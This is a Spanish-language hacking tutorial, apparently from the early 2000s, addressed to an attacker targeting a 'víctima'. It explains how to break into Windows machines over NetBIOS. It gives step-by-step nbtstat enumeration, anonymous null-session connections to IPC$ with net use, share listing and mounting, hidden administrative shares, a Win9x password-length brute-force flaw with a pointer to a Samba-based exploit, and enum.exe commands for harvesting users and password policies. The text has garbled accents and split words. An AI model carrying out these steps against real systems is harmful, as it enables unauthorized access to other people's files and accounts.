NETBIOS (Network Basic Output/Input System que en espaol Sistema Bsico de Red Entr ada/Salida) es el protocolo que se encarga

de compartir los archivos y las impre soras entre varios ordenadores. Tal vez habrs odo mencionar alguna vez el NETBEUI (NetBIOS Extended User Interface o Interfaz de Usuario Extendido),pues bien, es lo mismo pero NETBIOS lo desarrollaron IBM y Sytek, y NETBEUI lo desarrollo micr osoft, tratando de optimizar el NETBIOS para Windows. Es habitual or hablar simplemente del "139" este es el puerto por el que funciona este protocolo, el 137 y el 138 tambin forman parte de este protocolo, NetBIOS-ns NetBIOS-dgm NetBIOS-ssn 137 138 139 TCP / UDP TCP / UDP TCP / UDP NetBIOS NetBIOS NetBIOS Name Service Datagram Service Session Service

Para poder comprobar este ataque con xito debes tener instalado el protocolo en t u PC, para ello, si tienes Windows 95 / 98 /Me debes ir a INICIO \ CONFIGURACION \ PANEL DE CONTROL \ RED e instalar el cliente para redes Microsoft, el protocolo TCP/IP y activar "Compartir archivos e impresoras", si utilizas el Windows NT4 / 2000 / XP debes hacer lo mismo pero, en estos sistemas se hace en cada conexin a Internet por separado (slo necesitas activarlo en aquel la que vayas a utilizar para el ataque. ENTRANDO POR NETBIOS Lo que se explica a continuacin se puede utilizar desde un windows para atacar ot ro windows, aunque el ataque est pesado para NT sera muy similar si quisiramos atac ar un Windows 9x, pero no voy a entrar en muchos detalles, porque debido a que h oy en da existen maneras mas fciles y rpidas de hacerlo, esta seccin la he puesto slo como curiosidad. Una vez elegida la mquina a la que quieres entrar solo necesitas el Ms-Dos, o el Smbolo de Sistema, que para el caso es lo mismo, pues bien abres una ventana y es cribes: nbtstat -A 192.168.0.1 (si lo que conoces es la IP de la victima) nbtstat -a nombre_del_PC (si conoces solo su nombre) pueden ocurrir varias cosas, si recibes: C:\WINDOWS>nbtstat -A 192.168.0.1 Host not found. Pues queda claro que "not found" , o no est conectado, o no comparte archivos, o no existe (mira a ver si lo escribiste bien) Si la respuesta es: C:\WINDOWS>nbtstat -A 192.168.0.1 NetBIOS Remote Machine Name Table

Name

Type

Status

-------------------------------------------------------------NAME WORKGROUP NAME <00> UNIQUE <00> GROUP <03> UNIQUE Registered Registered Registered

MAC Address = 00-00-00-00-00-00 Pues aunque parezca mejor, para el caso nos da igual, porque aunque si lo tiene instalado, no comparte nada. Si recibimos: C:\WINDOWS>nbtstat -A 192.168.0.1 NetBIOS Remote Machine Name Table Name Type Status

---------------------------------------------------------------NAME WORKGROUP NAME NAME WORKGROUP <00> UNIQUE <00> GROUP <03> UNIQUE <20> UNIQUE <1E> GROUP Registered Registered Registered Registered Registered

MAC Address = 00-00-00-00-00-00 En este si... la diferencia importante es el <20> que corresponde al "File Serve r Service" (Servicio servidor de archivos), solo los PC que tienen el <20> tiene n archivos compartidos y accesibles. El IPC$ (Inter-Process Communication) es un recurso compartido oculto estndar en una mquina NT , y es utilizado por el servidor para establecer comunicacin con otr os equipos. Conectndose al IPC$ un intruso puede establecer una comunicacin valida con el serv idor NT. Conectndose como null, el intruso puede establecer dicha comunicacin sin necesidad de introducir user:password. Para ello se utiliza el siguiente comando: c:\>net use \\[ip_de_la_vctima]\ipc$ "" /user:"" The command completed successfully. Puedes ver qu comparte esa computadora sin necesidad de entrar, para ello utiliza el comando NET C:\>net view \\192.168.0.1

recibirs algo as: Shared resources at 192.168.0.1 Share name Type Used as Comment

---------------------------------------------------NETLOGON Test Disk Disk Logon server share

The command completed successfully. Es posible que ocurra: C:\>net view \\192.168.0.1 System error 5 has occurred. Entonces primero tienes que establecer la "null session" C:\>net use \\192.168.0.1\ipc$ "" /user:"" The command completed successfully. Ahora el C:\>net view \\192.168.0.1 si funcionar Para conectar a la carpeta compartida. The command completed successfully. Si escribes net use ahora, recibirs algo as: Status Local Remote Network

------------------------------------------------------------OK OK X: \\123.123.123.123\test Microsoft

\\123.123.123.123\test Microsoft

The command completed successfully. Para acceder directamente al PC solo tienes que: *escribir en el explrer \\192.168.0.1 *INICIO / EJECUTAR y poner lo mismo \\192.168.0.1 *Botn derecho en Mis Sitios de Red > Buscar Equipos... y lo mismo 192.168.0.1 *En una ventana de smbolo de sistema escribir: C:\>net use x: \\192.168.0.1\test y despus

C:\>dir x: Este ataque solo funcionar si la carpeta compartida no tiene pasword. Recuerda que un intruso no est limitado a los recursos compartidos que aparecen c on el net view. Un intruso que conozca NT sabe que existen otros recursos compartidos ocultos pa ra uso administrativo. Por defecto NT crea el IPC$ y otro por cada particin (por ejemplo una mquina que tiene C, D, y E tendr sus correspondientes C$, D$, y E$). Tambin hay un ADMIN$ que pertenece a la ruta donde fue instalado el NT (por ejemp lo si instalaste NT en C:\winnt, entonces ADMIN$ apunta exactamente a esa parte del disco). CRAKEANDO LOS PASSWORDS ----[esta parte est tomada del grupo DeepZone Digital Security]---El 24 de agosto del 2000 NS-FOCUS haca pblica una vulnerabilidad en la implementa cin del protocolo NETBIOS en todos los sistemas operativos corriendo el kernel 9x de la empresa Microsoft (tm), incluyendo el nuevo Windows ME y las versiones ms avanzadas de Windows 98. La vulnerabilidad en si misma no es ms que un error de implementacin a la hora de establecer la longitud del password para validarlo ante una peticin NETBIOS. Los sistemas vulnerables obtienen el nmero de bytes a comparar para el password d el paquete que reciben del cliente. Un usuario malicioso podra establecer la longitud del password a 1 byte intentar un ataque por fuerza bruta contra el password compartido. El nmero de intentos qu e debera realizar sera tan slo de 256 (2 elevado a 8). El exploit que proporciona NS-FOCUS en su WEB modifica el cliente de samba en su versin 2.0.6 para atacar los recursos compartidos de un sistema vulnerable.

Si alguno de los anteriores no funciona:

Ahora establezca una null session con vctima: net use \\victim\ipc$ /u:"" "" Note la sintaxis, se sigue el uso normal del comando NET USE. Esto significa "logueame con un nombre de usuario vaco y una clave vaca", la caracteristica del Usurario Annimo. Probablemente vea la respuesta "Comando completado exitosame nte", lo que significa que se estableci una null session o login annimo. Si, por el cont rario, ve un mensaje como "System error 5" quiere decir que alguien asegur a vctima de a

lguna manera contra logins annimos, felicitaciones!!. (nota: sin haber creado una null session, pruebe: "net view /domain:nombredomini o". Por alguna razn parece funcionar siempre, no importa cuanto se restrinja el uso de null sessions, raro. Aparentemente cualquiera puede obtener una lista de las mqui nas de un dominio). (nota: en Windows Server uno encuentra varios "shares" (recursos para compartir) que fueron creados sin nuestra intervencin). La mayora de estos shares son "hidde n" (ocultos) y se los nombra con $ al final. Ejemplos: C$, D$, ADMIN$. (nota: el "share" IPC$ es quizs uno de los shares mas usados en comunicaciones en tre servidores. Como leemos los "event logs" en otra computadora por ejemplo?. Uno n o mapea un "drive" sino los llamados "named pipes": un pedazo de la memoria que maneja l a comunicacin entre processos ya sean locales o remotos) Asumiendo que ya estableci una null session, pruebe el comando "net view \\vctima" , esto le dar la lista de "shares" (recursos compartidos) de esa computadora. Pero qu ms podemos ver?, bueno para explotar realmente lo que una null session nos puede dar necesitamos la herramienta multi-propsito para null sessions "enum .exe" que puede ser encontrada en razor.bindview.com/tools/desc/enum_readme.html. Se puede, abrir con alguna versin actual de PKZip. Dentro se encuentra un archivo llamado enum.exe, ese es el que necesi ta. Ejectelo desde la lnea de comandos para tratar de obtener la lista de usuarios, de mquinas en su grupo de trabajo, recursos compartidos, informacin de la poltica d e claves, grupos y dominios confiables. Pruebe con la siguiente lnea: enum -U -M -S -P -G -L victima